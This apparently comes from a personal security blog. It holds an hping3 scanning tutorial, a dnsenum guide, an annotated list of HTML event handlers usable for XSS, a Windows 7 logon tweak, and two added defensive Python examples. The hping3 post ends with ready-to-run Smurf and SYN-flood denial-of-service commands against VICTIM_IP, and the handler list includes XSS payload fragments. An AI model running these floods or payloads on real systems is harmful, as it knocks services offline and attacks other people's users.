Zer0w0rm

Welcome Back...



Hello All,

It has been a long time, almost 2 years... Finally I could make it to update my blog.

I have some good news for you people. I just completed my OSCP certification and I am planning to post a review on it soon.

From now onwards I am going to post every weekend, so stay tuned with me. ;)


Thank you (zer0w0rm)

Hping3 Tutorial With firewall

Hello, Today I will show you how to use hping3 for network mapping.

Hping3:
Hping3 is a network tool able to send custom TCP/IP packets and to display target replies, much as ping does with ICMP replies. It can handle fragmentation and almost arbitrary packet size and content from the command line interface.

  1. Testing ICMP :

    hping3 will behave like a normal ping utility, sending an ICMP echo request and receiving the ICMP echo reply.

    hping3 -1 [Ip_Address]
  2.  Traceroute using ICMP :

    This mimics tracert (Windows) or traceroute (Linux), which send ICMP packets whose TTL value increases by 1 each time.

    hping3 --traceroute -V -1 [Ip_Address]
     
  3. Checking port :

    Hping3 will send a SYN packet to the specified port (80 in our example). We can also control the local port from which the scan starts (5050).

    hping3 -V -S -p 80 -s 5050 [Ip_Address]

  4. Traceroute to a determined port :

    With hping3 you can also do a traceroute to a specified port and watch where your packet is blocked.

    hping3 --traceroute -V -S -p 80 -s 5050 [Ip_Address]
  5. Other types of ICMP :

    This example sends an ICMP address mask request (Type 17).

    hping3 -c 1 -V -1 -C 17 [Ip_Address]
  6. Other types of Port Scanning :

    The first type we will try is the FIN scan. In a TCP connection the FIN flag is used to start the connection closing routine. If we do not receive a reply, that means the port is open. Normally firewalls send a RST+ACK packet back to signal that the port is closed.

    hping3 -c 1 -V -p 80 -s 5050 -F [Ip_Address]
  7. Ack Scan :

    This scan can be used to see if a host is alive (when Ping is blocked for example). This should send a RST response back if the port is open.

    hping3 -c 1 -V -p 80 -s 5050 -A [Ip_Address]
  8. Xmas Scan :

    This scan sets the sequence number to zero and sets the URG + PSH + FIN flags in the packet. If the target device's TCP port is closed, the target device sends a TCP RST packet in reply. If the target device's TCP port is open, the target discards the TCP Xmas scan, sending no reply.

    hping3 -c 1 -V -p 80 -s 5050 -M 0 -UPF [Ip_Address]
  9. Null Scan :

    This scan sets the sequence number to zero and has no flags set in the packet. If the target device's TCP port is closed, the target device sends a TCP RST packet in reply. If the target device's TCP port is open, the target discards the TCP NULL scan, sending no reply.

    hping3 -c 1 -V -p 80 -s 5050 -M 0 [Ip_Address]

  10. Smurf Attack :

    This is a type of denial-of-service attack that floods a target system via spoofed broadcast ping messages.

    hping3 -1 --flood -a VICTIM_IP BROADCAST_ADDRESS
     
  11. DOS Land Attack :
    hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP
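
The scans in items 3 to 9 differ only in their TCP flag combinations, which is also how a defender recognises them in a packet capture. The following Python example is added here and is not part of the original post: it classifies constructed tcpdump-style lines (assumed addresses, 198.51.100.7 probing port 80 on 192.0.2.10) into the probe types above and reports any source that mixes several of them.

```python
import re
from collections import Counter

# Constructed tcpdump-style lines (not a real capture): 198.51.100.7 probes
# port 80 on 192.0.2.10 with the flag sets used by the hping3 commands above.
SAMPLE_LINES = """\
10:00:01.000 IP 198.51.100.7.5050 > 192.0.2.10.80: Flags [S], seq 1, win 512, length 0
10:00:01.100 IP 198.51.100.7.5051 > 192.0.2.10.80: Flags [F], seq 0, win 512, length 0
10:00:01.200 IP 198.51.100.7.5052 > 192.0.2.10.80: Flags [.], ack 1, win 512, length 0
10:00:01.300 IP 198.51.100.7.5053 > 192.0.2.10.80: Flags [FPU], seq 0, win 512, length 0
10:00:01.400 IP 198.51.100.7.5054 > 192.0.2.10.80: Flags [none], seq 0, win 512, length 0
10:00:01.500 IP 192.0.2.10.80 > 198.51.100.7.5051: Flags [R.], seq 0, ack 1, win 0, length 0
""".splitlines()

LINE_RE = re.compile(
    r"IP (?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): "
    r"Flags \[(?P<flags>[^\]]*)\]"
)

def classify(flags):
    """Map a tcpdump flag string to the probe type from the tutorial.
    tcpdump prints ACK as '.' and a segment with no flags as 'none'."""
    f = set() if flags == "none" else set(flags)
    if f == {"S"}:
        return "syn-probe"      # item 3: SYN/ACK back means open, RST means closed
    if f == {"F"}:
        return "fin-scan"       # item 6: RST back means closed; silence is open OR filtered
    if f == {"."}:
        return "ack-scan"       # item 7: RST back means the port is not filtered
    if f == {"F", "P", "U"}:
        return "xmas-scan"      # item 8: same RST/silence rule as the FIN scan
    if not f:
        return "null-scan"      # item 9: same RST/silence rule as the FIN scan
    return "other"              # replies, normal traffic, anything else

def scan_report(lines, local_prefix="192.0.2."):
    """Count probe types per external source; our own hosts' replies are skipped."""
    report = {}
    for line in lines:
        m = LINE_RE.search(line)
        if not m or m["src"].startswith(local_prefix):
            continue
        report.setdefault(m["src"], Counter())[classify(m["flags"])] += 1
    return report

def suspicious_sources(report, min_kinds=3):
    """A single source mixing several probe types is mapping, not browsing."""
    return sorted(src for src, kinds in report.items() if len(kinds) >= min_kinds)
```

The silence case matters in practice: a FIN, Xmas or Null probe that gets no answer can mean an open port or a dropping firewall, so pair it with the SYN probe result before drawing a conclusion.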


Thank you (zer0w0rm)

Dnsenum information gathering tutorial

Hello Guys 

Today I will show you the DNSENUM information gathering tool.

DNSenum is a pentesting tool created to enumerate DNS info about domains.

The purpose of Dnsenum is to gather as much information as possible about a domain.

DNSenum is a very useful tool for the quick enumeration step of a penetration test. It gathers:
    Host address
    Name server
    MX record
    Sub domains
    Whois queries
    Reverse lookup for netblocks
    Use Google to help do the job

use:
------------------------------------------------------------------
1)Simple scan
     dnsenum google.com

2)Powerful scan use
     dnsenum --enum google.com

3)More power scan with sub domains
     dnsenum --enum -f -r google.com

Note:

If you get an error like this:

Warning: can't load Net::Whois::IP module, whois queries disabled.

--> apt-get install cpanminus
--> cpanm -n Net::Whois::IP




Thank you (zer0w0rm)



HTML event handlers

Hello, today I will share with you some HTML event handlers which are used in XSS and in web event handling generally.

1.    FSCommand() (attacker can use this when executed from within an embedded Flash object)
2.    onAbort() (when user aborts the loading of an image)
3.    onActivate() (when object is set as the active element)
4.    onAfterPrint() (activates after user prints or previews print job)
5.    onAfterUpdate() (activates on data object after updating data in the source object)
6.    onBeforeActivate() (fires before the object is set as the active element)
7.    onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand("Copy") function)
8.    onBeforeCut() (attacker executes the attack string right before a selection is cut)
9.    onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
10.    onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
11.    onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function)
12.    onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function).
13.    onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
14.    onBegin() (the onbegin event fires immediately when the element's timeline begins)
15.    onBlur() (in the case where another popup is loaded and window loses focus)
16.    onBounce() (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window)
17.    onCellChange() (fires when data changes in the data provider)
18.    onChange() (select, text, or TEXTAREA field loses focus and its value has been modified)
19.    onClick() (someone clicks on a form)
20.    onContextMenu() (user would need to right click on attack area)
21.    onControlSelect() (fires when the user is about to make a control selection of the object)
22.    onCopy() (user needs to copy something or it can be exploited using the execCommand("Copy") command)
23.    onCut() (user needs to copy something or it can be exploited using the execCommand("Cut") command)
24.    onDataAvailable() (user would need to change data in an element, or attacker could perform the same function)
25.    onDataSetChanged() (fires when the data set exposed by a data source object changes)
26.    onDataSetComplete() (fires to indicate that all data is available from the data source object)
27.    onDblClick() (user double-clicks a form element or a link)
28.    onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document)
29.    onDrag() (requires that the user drags an object)
30.    onDragEnd() (requires that the user drags an object)
31.    onDragLeave() (requires that the user drags an object off a valid location)
32.    onDragEnter() (requires that the user drags an object into a valid location)
33.    onDragOver() (requires that the user drags an object into a valid location)
34.    onDragDrop() (user drops an object (e.g. file) onto the browser window)
35.    onDrop() (user drops an object (e.g. file) onto the browser window)
36.    onEnd() (the onEnd event fires when the timeline ends.  This can be exploited, like most of the HTML+TIME event handlers by doing something like <P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">)
37.    onError() (loading of a document or image causes an error)
38.    onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)
39.    onFilterChange() (fires when a visual filter completes state change)
40.    onFinish() (attacker can create the exploit when marquee is finished looping)
41.    onFocus() (attacker executes the attack string when the window gets focus)
42.    onFocusIn() (attacker executes the attack string when window gets focus)
43.    onFocusOut() (attacker executes the attack string when window loses focus)
44.    onHelp() (attacker executes the attack string when users hits F1 while the window is in focus)
45.    onKeyDown() (user depresses a key)
46.    onKeyPress() (user presses or holds down a key)
47.    onKeyUp() (user releases a key)
48.    onLayoutComplete() (user would have to print or print preview)
49.    onLoad() (attacker executes the attack string after the window loads)
50.    onLoseCapture() (can be exploited by the releaseCapture() method)
51.    onMediaComplete() (When a streaming media file is used, this event could fire before the file starts playing)
52.    onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem)
53.    onMouseDown() (the attacker would need to get the user to click on an image)
54.    onMouseEnter() (cursor moves over an object or area)
55.    onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again)
56.    onMouseMove() (the attacker would need to get the user to mouse over an image or table)
57.    onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again)
58.    onMouseOver() (cursor moves over an object or area)
59.    onMouseUp() (the attacker would need to get the user to click on an image)
60.    onMouseWheel() (the attacker would need to get the user to use their mouse wheel)
61.    onMove() (user or attacker would move the page)
62.    onMoveEnd() (user or attacker would move the page)
63.    onMoveStart() (user or attacker would move the page)
64.    onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline)
65.    onPaste() (user would need to paste or attacker could use the execCommand("Paste") function)
66.    onPause() (the onpause event fires on every element that is active when the timeline pauses, including the body element)
67.    onProgress() (attacker would use this as a flash movie was loading)
68.    onPropertyChange() (user or attacker would need to change an element property)
69.    onReadyStateChange() (user or attacker would need to change an element property)
70.    onRepeat() (the event fires once for each repetition of the timeline, excluding the first full cycle)
71.    onReset() (user or attacker resets a form)
72.    onResize() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
73.    onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
74.    onResizeStart() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
75.    onResume() (the onresume event fires on every element that becomes active when the timeline resumes, including the body element)
76.    onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
77.    onRowsEnter() (user or attacker would need to change a row in a data source)
78.    onRowExit() (user or attacker would need to change a row in a data source)
79.    onRowDelete() (user or attacker would need to delete a row in a data source)
80.    onRowInserted() (user or attacker would need to insert a row in a data source)
81.    onScroll() (user would need to scroll, or attacker could use the scrollBy() function)
82.    onSeek() (the onseek event fires when the timeline is set to play in any direction other than forward)
83.    onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
84.    onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
85.    onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
86.    onStart() (fires at the beginning of each marquee loop)
87.    onStop() (user would need to press the stop button or leave the webpage)
88.    onSyncRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire)
89.    onSubmit() (requires attacker or user submits a form)
90.    onTimeError() (user or attacker sets a time property, such as dur, to an invalid value)
91.    onTrackChange() (user or attacker changes track in a playList)
92.    onUnload() (as the user clicks any link or presses the back button or attacker forces a click)
93.    onURLFlip() (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
94.    seekSegmentTime() (this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)
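
Because this list is long and still not exhaustive, a defender does not maintain it as a blocklist: any attribute whose name starts with "on", plus the HTML+TIME behavior style from item 36, is treated as script. The following Python example is added here and is not part of the original post; it audits constructed sample markup with the standard library html.parser and reports every such attribute, which is the check a sanitizer or a code reviewer wants.

```python
from html.parser import HTMLParser

class HandlerAuditor(HTMLParser):
    """Records inline event handlers and HTML+TIME 'behavior' styles in markup."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, attribute, value) for every hit

    def handle_starttag(self, tag, attrs):
        # html.parser already lowercases attribute names, so ONLOAD and onload
        # are caught alike; a missing value (e.g. <a onclick>) comes back as None.
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):
                self.findings.append((tag, name, value))
            elif name == "style" and "behavior:" in value.replace(" ", "").lower():
                self.findings.append((tag, name, value))

def audit_markup(markup):
    """Return the list of (tag, attribute, value) that would run script."""
    auditor = HandlerAuditor()
    auditor.feed(markup)
    auditor.close()
    return auditor.findings

def is_handler_free(markup):
    """True when markup carries no inline handler; this is the rule an
    allow-list sanitizer enforces instead of enumerating 94 names."""
    return not audit_markup(markup)

# Constructed sample: three handlers from the list (including the HTML+TIME
# onEnd trick) next to a harmless link. 'x()' stands in for any script.
SAMPLE_MARKUP = (
    '<div ONMOUSEOVER="x()"><img src="a.png" onerror="x()">'
    '<p style="behavior:url(\'#default#time2\')" onend="x()">hi</p>'
    '<a href="/ok" title="plain">ok</a></div>'
)
```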



Thank you (zer0w0rm)

How to Change Windows 7 Logon Screen?

How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the logon screen background.


1. The image you need to set as the background should be a .jpg file and its size should not exceed 245KB.
 
2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or 1024 x 768. You can use any photo editing software such as Photoshop to compress and set the resolution for your
image. Once you're done, save this image as background.jpg.
 
3. You will need to copy this image to
C:\Windows\system32\oobe\backgrounds
You will need to create that path if it does not already exist on your computer.
 
4. Now open the Registry Editor (Start -> Run -> type regedit) and
navigate to the following key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background
If Background does not exist, right-click LogonUI, select New and then Key, and name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background,
select New and then DWORD, and name it OEMBackground.
 
5. Double-click on OEMBackground and set the Value Data to 1.
 
6. Now log off to see the new logon screen background.

Thank you (zer0w0rm)